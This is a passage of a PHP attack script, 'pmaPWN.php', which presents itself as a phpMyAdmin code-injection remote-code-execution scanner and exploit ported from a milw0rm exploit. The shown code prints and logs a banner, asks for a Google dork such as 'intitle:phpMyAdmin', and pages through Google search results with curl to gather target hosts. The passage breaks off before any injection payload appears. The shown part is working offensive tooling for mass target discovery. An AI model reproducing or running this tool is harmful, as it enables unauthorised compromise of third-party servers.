1) { print "|****************************************************************|\n"; print " pmaPWN.php - d3ck4, hacking.expose@gmail.com\n"; print " phpMyAdmin Code Injection RCE Scanner & Exploit\n"; print " This is PHP version original http://milw0rm.com/exploits/8921\n"; print " credit: Greg Ose, pagvac @ gnucitizen.org\n"; print " greetz: Hacking Expose!, HM Security, darkc0de\n"; print "|****************************************************************|\n"; print "\n"; print "Usage: php $argv[0] \n"; exit; } print "|****************************************************************|\n"; print " pmaPWN.php - d3ck4, hacking.expose@gmail.com\n"; print " phpMyAdmin Code Injection RCE Scanner & Exploit\n"; print " This is PHP version original http://milw0rm.com/exploits/8921\n"; print " credit: Greg Ose, pagvac @ gnucitizen.org\n"; print " greetz: Hacking Expose!, HM Security, darkc0de\n"; print "|****************************************************************|\n"; print "\n"; $Handlex = FOpen("pmaPWN.log", "a+"); FWrite($Handlex, "|****************************************************************|\n"); FWrite($Handlex, " pmaPWN.php - d3ck4, hacking.expose@gmail.com\n"); FWrite($Handlex, " phpMyAdmin Code Injection RCE Scanner & Exploit\n"); FWrite($Handlex, " This is PHP version original http://milw0rm.com/exploits/8921\n"); FWrite($Handlex, " credit: Greg Ose, pagvac @ gnucitizen.org\n"); FWrite($Handlex, " greetz: Hacking Expose!, HM Security, darkc0de\n"); FWrite($Handlex, "|****************************************************************|\n\n"); print "[-] Master, where you want to go today? \n"; print "[-] example dork: intitle:phpMyAdmin \n"; fwrite(STDOUT, "\n[ pwn3r@google ~] ./dork -s "); $dork = trim(fgets(STDIN)); print "\n[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n"; FWrite($Handlex, "[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n"); for($i = 0; $i <= 900; $i+=100) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=$dork&num=100&hl=en&as_qdr=all&start=$i&sa=N"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 200); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_REFERER, "http://google.com"); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9'); $pg = curl_exec($ch); curl_close($ch); if (preg_match_all("/